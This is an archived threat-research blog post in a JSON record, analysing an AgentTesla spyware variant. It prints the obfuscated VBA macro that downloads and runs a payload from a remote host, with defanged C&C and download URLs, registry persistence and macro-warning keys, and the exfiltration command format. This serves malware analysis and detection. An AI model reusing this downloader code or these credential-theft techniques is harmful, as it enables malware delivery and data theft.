{
	"id": "b49b07fc-2f33-455a-9b3e-16889b65a40c",
	"created_at": "2026-04-06T00:08:42.134162Z",
	"updated_at": "2026-04-10T03:21:31.322258Z",
	"deleted_at": null,
	"sha1_hash": "605e8b605960ac2a06f20739fc8b3e85890adfe6",
	"title": "In-Depth Analysis of A New Variant of .NET Malware AgentTesla",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4015511,
	"plain_text": "In-Depth Analysis of A New Variant of .NET Malware AgentTesla\r\nBy Xiaopeng Zhang\r\nPublished: 2017-06-28 · Archived: 2026-04-05 15:05:33 UTC\r\nBackground\r\nFortiGuard Labs recently captured some malware which was developed using the Microsoft .Net framework. I\r\nanalyzed one of them; it's a new variant from the AgentTesla family. In this blog, I’m going to show you how it is able\r\nto steal information from a victim’s machine.\r\nThe malware was spread via a Microsoft Word document that contained an auto-executable malicious VBA\r\nMacro. Figure 1 below shows how it looks when it’s opened.\r\nFigure 1. When the malicious Word document is opened\r\nWhat the VBA code does\r\nOnce you click the “Enable Content” button, the malicious VBA Macro is executed covertly in the background.\r\nThe code first writes some key values into the device’s system registry to avoid the Macro security warning when\r\nhttps://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html\r\nPage 1 of 14\n\nopening Word documents with risky content the next time.\r\nHere are the key values it writes into the system registry:\r\nHKCU\\Software\\Microsoft\\Office\\{word version}\\Word\\Security\\,AccessVBOM, dword, 1\r\nHKCU\\Software\\Microsoft\\Office\\{word version}\\Word\\Security\\,VBAWarning, dword, 1\r\nFigure 2. Writing two key values into the system registry\r\nOnce that task is completed, it re-opens this Word document in a new Word program instance and exits. The\r\nMacro is executed again, but this time it follows a different code branch. 
The main purpose of the Macro executed\r\nin the new Word program instance is to dynamically extract a new VBA function (ljRIpdKkSmQPMbnLdh) and\r\ncall it.\r\nLet’s take a look at this function:\r\nSub ljRIpdKkSmQPMbnLdh()\r\n Dim dmvAQJch As String\r\n Dim JWyaIoTHtZaFG As String\r\n Dim TrbaApjsFydVkOGwjnzkpOB As String\r\n dmvAQJch = CreateObject(ThisDocument.bQYHDG(\"66627281787F833D6277747B7B\",\r\n15)).ExpandEnvironmentStrings(ThisDocument.bQYHDG(\"3463747C7F34\", 15))\r\n JWyaIoTHtZaFG = ThisDocument.bQYHDG(\"6B\", 15)\r\n TrbaApjsFydVkOGwjnzkpOB = ThisDocument.bQYHDG(\"797085823D748774\", 15)\r\n dmvAQJch = dmvAQJch + JWyaIoTHtZaFG + TrbaApjsFydVkOGwjnzkpOB\r\n Dim cllbWRRTqqWoZebEpYdGmnPBLAx As String\r\n cllbWRRTqqWoZebEpYdGmnPBLAx = ThisDocument.bQYHDG(\"7783837F493E3E43443D46463D42443D4142\r\n15)\r\n Dim OhYBGFWMcPWNnpvvuTeitVAK As Object\r\n Set OhYBGFWMcPWNnpvvuTeitVAK =\r\nCreateObject(ThisDocument.bQYHDG(\"5C7872817E827E75833D675C5B5763635F\", 15))\r\n OhYBGFWMcPWNnpvvuTeitVAK.Open ThisDocument.bQYHDG(\"565463\", 15), cllbWRRTqqWoZebEpYdGmn\r\n OhYBGFWMcPWNnpvvuTeitVAK.send\r\n If OhYBGFWMcPWNnpvvuTeitVAK.Status = 200 Then\r\n Dim BIPvJqwtceisuIuipCzbpsWRuhRwp As Object\r\n Set BIPvJqwtceisuIuipCzbpsWRuhRwp =\r\nCreateObject(ThisDocument.bQYHDG(\"50535E53513D62838174707C\", 15))\r\n BIPvJqwtceisuIuipCzbpsWRuhRwp.Open\r\n BIPvJqwtceisuIuipCzbpsWRuhRwp.Type = 1\r\n BIPvJqwtceisuIuipCzbpsWRuhRwp.Write OhYBGFWMcPWNnpvvuTeitVAK.responseBody\r\n BIPvJqwtceisuIuipCzbpsWRuhRwp.SaveToFile dmvAQJch, 2\r\n BIPvJqwtceisuIuipCzbpsWRuhRwp.Close\r\n End If\r\n If Len(Dir(dmvAQJch)) \u003c\u003e 0 Then\r\n Dim TGoCeWgrszAukk\r\n TGoCeWgrszAukk = Shell(dmvAQJch, 0)\r\n End If\r\nEnd Sub\r\nAll keywords in this function are encoded. 
Here they are after decoding:\r\nbQYHDG(\"66627281787F833D6277747B7B\", 15) =\u003e “WScript.Shell”\r\nbQYHDG(\"3463747C7F34\", 15) =\u003e “%Temp%”\r\nbQYHDG(\"797085823D748774\", 15) =\u003e “javs.exe”\r\nbQYHDG(\"7783837F493E3E43443D46463D42443D4142483E403E837E7370883D748774\", 15) =\u003e “hxxp://45.\r\nbQYHDG(\"5C7872817E827E75833D675C5B5763635F\", 15) =\u003e “Microsoft.XMLHTTP”\r\nbQYHDG(\"565463\", 15) =\u003e “Get”\r\nAs you may have realized from the highlighted keywords, this malware is designed to download an executable file\r\nand run it by calling the “Shell” function. Indeed, it downloads the file “today.exe” to “%Temp%\\javs.exe”, and\r\nruns it.\r\nThe downloaded exe file\r\nFigure 3. Detailed information of the downloaded javs.exe file\r\nFrom the analysis result of the PE analysis tool in Figure 3, we know that the downloaded “javs.exe” was\r\nbuilt with .Net Framework. Looking at its icon, it is easy to assume that this is a PDF-related file. But it’s not. This\r\nis simply a deception used to confuse the victim.\r\nOnce executed, it starts another process by calling the function CreateProcessA with the CREATE_SUSPENDED\r\nflag. Starting the process suspended allows the memory of the second process to be modified by calling the function\r\nWriteProcessMemory. Finally, the process is resumed by calling the functions SetThreadContext and\r\nResumeThread.\r\nFigure 4, below, shows how CreateProcessA is called.\r\nFigure 4. javs.exe calls CreateProcessA\r\nThrough my analysis, I was able to determine that the data being injected into the second process by calling\r\nWriteProcessMemory is another executable file. This file was decoded from a BMP resource in the first javs.exe\r\nprocess. Interestingly, the injected executable was also built with .Net framework.\r\nAs you may know, a .Net program only contains compiled bytecode. 
This code can only be parsed and executed\r\nin its .Net CLR virtual machine. As a result, debugging a .Net program using the usual OllyDbg or WinDbg tools is\r\na challenge. So I had to determine which other analysis tools would work.\r\nAnalysis of the second .Net program\r\nFrom the above analysis, I was able to determine that the second .Net program had been dynamically decoded\r\nfrom the javs.exe process memory. So the next challenge was capturing its entire data and saving it as an exe file\r\nfor analysis. To do that, I used a memory tool to dump it directly from the second process memory. Figure 5\r\nshows what the dumped file looks like in the analysis tool.\r\nFigure 5. Dumped memory file in analysis tool\r\nThe “File is corrupted” warning obviously occurs because the dumped file’s PE header was wrong. I manually\r\nrepaired the PE header using a sort of unpacking technique. After that, the dumped file could be recognized,\r\nstatically analyzed, and debugged. In Figure 6 below, you can see the repaired file was recognized as a .Net\r\nassembly, and you can even see .NET Directory information in CFF Explorer.\r\nFigure 6. Repaired dump file in analysis tool\r\nThe author of the malware used some anti-analysis techniques to prevent it from being analyzed. For example,\r\nobfuscation is used to make the function names and variable names difficult to understand, and encoding is used\r\nto hide keywords and data so analysts have a hard time understanding what it is trying to do. The repaired .Net\r\nprogram even causes the static analysis tool .NET Reflector to not work because the names of classes, functions,\r\nand variables are unreadable. 
From Figure 7 below, you can see what the code looks like using these techniques.\r\nFigure 7. The Main function with anti-analysis techniques\r\nTo better analyze the malware, I tried to rename parts of the unreadable names. So please note that in the\r\nfollowing analysis the unreadable names in the code shown have been renamed to readable names.\r\nOk, at this point we are finally ready to do the analysis. Let’s get started to see what is going to happen.\r\nAnalysis of the .Net malware\r\nOnce executed, it goes through the currently running processes to kill any duplicate processes found. It then sends\r\n“uninstall” and “update” commands to the C\u0026C server. If the response to the “uninstall” command from the\r\nserver contains an “uninstall” string, it cleans up the information it has written on the victim’s machine and exits.\r\nWhen I ran the malware, no “uninstall” string was contained in the response, so I could proceed with the analysis.\r\nThe following two Figures show you how the “update” command is sent to the C\u0026C server.\r\nFigure 8. Sending “update” command to C\u0026C server\r\nFigure 9. Function used to send data to the C\u0026C server\r\nFrom Figure 9, we learn that the URL of the C\u0026C server is\r\n“hxxp://www.vacanzaimmobiliare.it/testla/WebPanel/post.php”, which was decrypted in the “SendToCCServer”\r\nfunction. The HTTP method is “POST”, which was also decrypted.\r\nNext, it copies itself from “%temp%\\javs.exe” to “%appdata%\\Java\\JavaUpdtr.exe”. In this way it disguises itself\r\nby looking like an update program for Java. 
It then writes the full path into the value\r\n\"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load\" in the system registry so that “JavaUpdtr.exe”\r\ncan be executed automatically when the system starts.\r\nThe code snippet below shows us how the full path to “JavaUpdtr.exe” is defined.\r\nprivate static string appdata_Java_JavaUpdtr.exe = Environment.GetEnvironmentVariable(\"appd\r\nThis malware can record the victim’s keyboard inputs, steal data from the system clipboard when its content\r\nchanges, capture screenshots of the victim’s system screen, and collect credentials from installed software that the\r\nmalware is interested in. To complete these tasks, it creates a variety of threads and timers.\r\nIn the following sections I’ll discuss them in detail.\r\nStealing keyboard inputs, system clipboard contents, and screenshots\r\nBefore the Main function is called, three hook objects are defined in the constructor of the main class.\r\nThese are used for hooking the Keyboard, Mouse, and Clipboard. It then sets hook functions for all of them so\r\nthat when the victim types something on the keyboard, or when the clipboard data is changed (Ctrl+C), the hook\r\nfunctions will be called first. Figure 10 shows part of the hook function of the key down event.\r\nFigure 10. Key “down” event hook function\r\nIn this function, it first grabs the title of the window the victim is typing into and puts it into an html code. Next, it\r\ncaptures which key the victim presses, and converts the key code string into an html code. For example, “\r\n\". As you can see, the html code is concatenated\r\nto the variable “pri_string_saveAllStolenKey_Clipboard_Data”. Note: I modified the name to be readable.\r\nIn the hook function for the system clipboard, it goes through a similar process. 
It captures the clipboard content\r\nevery time the clipboard content is changed (e.g. pressing Ctrl+C, Ctrl+X, etc.) by calling the function\r\nClipboard.GetText(). It then puts the collected data into an html code, and again concatenates it to the variable\r\n“pri_string_saveAllStolenKey_Clipboard_Data”. Figure 11 is the code snippet of this function.\r\nFigure 11. Clipboard change event hook function\r\nIt also creates a timer whose function is called every 10 minutes. In the timer function, it captures screenshots of\r\nthe victim’s screen by using the API “Graphics::CopyFromScreen” and saves them\r\ninto the file “%appdata%\\ScreenShot\\screen.jpeg”. It later encodes the file screen.jpeg with base64 and then sends\r\nit to its C\u0026C server using the command “screenshots”.\r\nIt keeps taking screenshots every 10 minutes and sends them to the C\u0026C server so the malware author can see\r\nwhat the victim is doing. Figure 12 shows the malware sending out a screen.jpeg file by calling the sending\r\nfunction.\r\nFigure 12. Sending out a screenshot file\r\nStealing the credentials of installed software\r\nAt the end of the Main function, it creates another thread whose function is to collect credentials from a variety of\r\nsoftware on the victim’s machine. It can collect user credentials from the system registry, local profile files,\r\nSQLite database files, and so on. Once it has captured the credentials of one of the software packages it is looking\r\nfor, it immediately sends them to the C\u0026C server. 
One HTTP packet contains the credentials of one software package.\r\nBased on my analysis, this malware is able to obtain the credentials from the following software.\r\nBrowser clients:\r\nGoogle Chrome, Mozilla Firefox, Opera, Yandex, Microsoft IE, Apple Safari, SeaMonkey, ComodoDragon,\r\nFlockBrowser, CoolNovo, SRWareIron, UC browser, Torch Browser.\r\nEmail clients:\r\nMicrosoft Office Outlook, Mozilla Thunderbird, Foxmail, Opera Mail, PocoMail, Eudora, TheBat!.\r\nFTP clients:\r\nFileZilla, WS_FTP, WinSCP, CoreFTP, FlashFXP, SmartFTP, FTPCommander.\r\nDynamic DNS:\r\nDynDNS, No-IP.\r\nVideo chatting:\r\nPaltalk, Pidgin.\r\nDownload management:\r\nInternet Download Manager, JDownloader.\r\nIn my test environment, I installed Microsoft Office Outlook with a Gmail account. Figure 13 shows what\r\nOutlook data is sent to the C\u0026C server.\r\nFigure 13. Sending the captured credentials of Microsoft Office Outlook\r\nC\u0026C command format\r\nBelow is the C\u0026C command format string.\r\n\"type={0}\u0026hwid={1}\u0026time={2}\u0026pcname={3}\u0026logdata={4}\u0026screen={5}\u0026ipadd={6}\u0026wbscreen={7}\u0026client={8}\u0026link={9}\u0026username={10}\u0026password={11}\u0026screen_name={12}\"\r\nNext, I will explain the meaning of each field.\r\n\"type\" holds the command name; \"hwid\" is the hardware id; \"time\" is the current date and time; \"pcname\"\r\nconsists of the user name and computer name; \"logdata\" consists of key log and clipboard data; \"screen\" is the base64-\r\nencoded screen.jpeg file content; \"ipadd\" is not used; \"wbscreen\" consists of picture content from the camera;\r\n\"client\" is the name of the software; \"link\" is the software’s website; \"username\" is the logon user name;\r\n\"password\" is the 
logon password; \"screen_name\" is not used.\r\nIn the table below, all the C\u0026C commands (type field) that the malware supports are listed.\r\nCommand Comment\r\nuninstall Asks the server whether it should remove itself and exit\r\nupdate Sends the server updates about the victim’s device\r\ninfo Sends the server the victim’s system information\r\nwebcam Sends image files from the victim’s camera, if one is present\r\nscreenshots Sends a screenshot of the victim’s screen\r\nkeylog Sends the server the recorded key inputs and clipboard data\r\npasswords Sends the credentials collected from the software listed above\r\nOther features\r\nThrough my analysis I was able to determine that this is spyware designed to collect a victim’s system\r\ninformation, continually record the victim’s keyboard inputs and changes to the system clipboard, and\r\ncapture the credentials of a number of popular software tools. Finally, it sends all the collected data to its C\u0026C\r\nserver.\r\nHowever, by carefully going through the decompiled *.cs files, I was able to discover some additional features\r\nbuilt into this malware that are not currently used. 
They include:\r\nUsing the SMTP protocol to communicate with the server instead of HTTP.\r\nObtaining system hardware information, including processor, memory, and video card.\r\nEnabling the collection of images from the victim’s camera.\r\nRestarting the system after adding “JavaUpdtr.exe” to the startup group in the system registry.\r\nKilling any running analysis processes, AV software, keylogger software, etc.\r\nThese features may be used in future versions.\r\nSolution\r\nThe Word sample is detected as “WM/Agent.DJO!tr.dldr”, and Javs.exe has been detected as\r\n“MSIL/Generic.AP.EA826!tr” by the FortiGuard AntiVirus service.\r\nThe URL of the C\u0026C server has been detected as “Malicious Websites” by the FortiGuard WebFilter service.\r\nIoC:\r\nURL:\r\n45.77.35.239/1/today.exe\r\nwww.vacanzaimmobiliare.it/testla/WebPanel/post.php\r\nSample SHA256:\r\nYachtworld Invoice Outstanding.doc\r\n1A713E4DDD8B1A6117C10AFE0C45496DFB61154BFF79A6DEE0A9FFB0518F33D3\r\nJavs.exe\r\n5D4E22BE32DCE5474B61E0DF305861F2C07B10DDADBC2DC937481C7D2B736C81\r\nSource: https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"ETDA"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html"
	],
	"report_names": [
		"in-depth-analysis-of-net-malware-javaupdtr.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434122,
	"ts_updated_at": 1775791291,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/605e8b605960ac2a06f20739fc8b3e85890adfe6.pdf",
		"text": "https://archive.orkl.eu/605e8b605960ac2a06f20739fc8b3e85890adfe6.txt",
		"img": "https://archive.orkl.eu/605e8b605960ac2a06f20739fc8b3e85890adfe6.jpg"
	}
}